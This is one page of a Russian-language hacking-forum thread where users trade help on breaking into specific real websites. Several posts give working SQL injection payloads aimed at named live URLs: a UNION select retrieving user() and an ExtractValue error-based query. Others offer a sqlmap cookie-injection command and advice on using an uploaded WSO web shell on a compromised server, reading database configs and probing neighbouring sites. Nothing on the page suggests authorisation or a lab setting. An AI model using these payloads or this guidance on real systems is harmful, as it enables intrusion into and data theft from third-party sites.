Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1178 of 1207
  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    неполучается стянуть, или тут он не работает?)
     
    #23541 Br@!ns, 4 Sep 2014
  2. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Code:
    http://www..**********/pixsell/imageview.php?id=392751  union/*!select*/  (1),(2),(user()),(4),(5),(6),(7),(8),(9),(10),(11),(12)
     
    #23542 Inoms, 7 Sep 2014
    Last edited: 8 Sep 2014
    1 person likes this.
  3. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребят подскажите как через wso шелл создать бд
     
    #23543 cyborgx, 10 Sep 2014
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!
     
    _________________________
    #23544 winstrool, 10 Sep 2014
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    _http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.
     
    #23545 Br@!ns, 10 Sep 2014
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://www.moysvet.ru/catalog/view/118876'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
    #23546 kingbeef, 10 Sep 2014
    2 people like this.
  7. BuG_4F

    BuG_4F Member

    Joined:
    20 May 2008
    Messages:
    88
    Likes Received:
    67
    Reputations:
    5
    Помогите раскрутить скулю
     
    #23547 BuG_4F, 10 Sep 2014
  8. Inkognito2008

    Inkognito2008 New Member

    Joined:
    10 Sep 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Есть участок кода на чужом сайте:

    Code:
    <?php
$data=file_get_contents("http://site.ru");
echo $data;
?>
    Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.

    Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?


    .
     
    #23548 Inkognito2008, 10 Sep 2014
    Last edited: 10 Sep 2014
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data;
    Ищи конфиги БД и пробуй подключиться!
     
    _________________________
    #23549 winstrool, 10 Sep 2014
  10. Inkognito2008

    Inkognito2008 New Member

    Joined:
    10 Sep 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Сайт без БД, то есть код выполнить никак нельзя?

    Если говорить точнее то вывод идет через:

    Code:
    $GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
    Вывод подхватывается JS и выводится на сайте.
     
    #23550 Inkognito2008, 10 Sep 2014
    Last edited: 10 Sep 2014
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...
     
    _________________________
    #23551 winstrool, 10 Sep 2014
  12. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Помогите составить запрос в sqlmap на sql inj cookie
    sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1
    верно? Он то показывает блинд , то нет
     
    #23552 yeti2, 10 Sep 2014
  13. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
     
    #23553 cyborgx, 10 Sep 2014
    Last edited: 10 Sep 2014
  14. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Помогите раскрутить :)

    HTML:
    http://www.svetodom.ru/brand/jhkhjkhjk
http://www.svetodom.ru/brand/jhkhjkhjk+AND
     
    #23554 Br@!ns, 11 Sep 2014
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    а что сложного использовать error-based?
    например ExtractValue

     
    _________________________
    #23555 HAXTA4OK, 11 Sep 2014
    1 person likes this.
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Br@!ns, еще добавлю, что нынче модно использовать короткие запросы. Вот еще для изучения пару векторов с выводом через error-based (VolgaCTF::MySQL Game):

     
    #23556 YaBtr, 11 Sep 2014
    2 people like this.
  17. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз

    залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
     
    #23557 cyborgx, 12 Sep 2014
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    нет...
     
    #23558 qaz, 12 Sep 2014
  19. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету.
    Можно ли такое раскрутить?
     
    #23559 int, 26 Sep 2014
  20. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    База на другом сервере ----> ничего не получится.
     
    #23560 UXOR, 27 Sep 2014
(You must log in or sign up to post here.)
Page 1178 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.